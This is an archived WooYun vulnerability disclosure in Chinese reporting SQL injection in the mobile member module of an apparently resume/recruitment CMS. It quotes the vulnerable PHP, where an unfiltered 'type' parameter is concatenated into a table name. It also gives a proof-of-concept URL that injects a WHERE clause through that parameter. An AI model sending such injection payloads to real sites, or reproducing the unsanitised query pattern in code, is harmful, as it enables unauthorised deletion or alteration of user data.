乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向第三方安全合作伙伴开放 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
RT
出现在wap\member\model\index.class.php中
function rinfo_action(){ if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->complete($resume_row); $data['msg']='删除成功!'; }else{ $data['msg']='删除失败!'; } $data['url']="index.php?c=rinfo&eid=".(int)$_GET['eid']."&type=".$_GET['type']; $this->yunset("layer",$data); } $this->rightinfo(); $this->yunset($this->MODEL('cache')->GetCache(array('city','user','hy','job'))); $rows=$this->obj->DB_select_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("rows",$rows); $this->yunset("type",$_GET['type']); $this->yunset("eid",$_GET['eid']); $this->waptpl('rinfo');
可见
if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");
$_GET['type']被带进去,没有单引号没过滤我们提交
http://127.0.0.1/upload/wap/member/index.php?c=rinfo&id=1&type=expect%60%20where%20id%3D3%23
语句被带进去执行了。
单引号
危害等级:中
漏洞Rank:10
确认时间:2015-07-10 10:41
感谢您的提供,我们会尽快修复!
暂无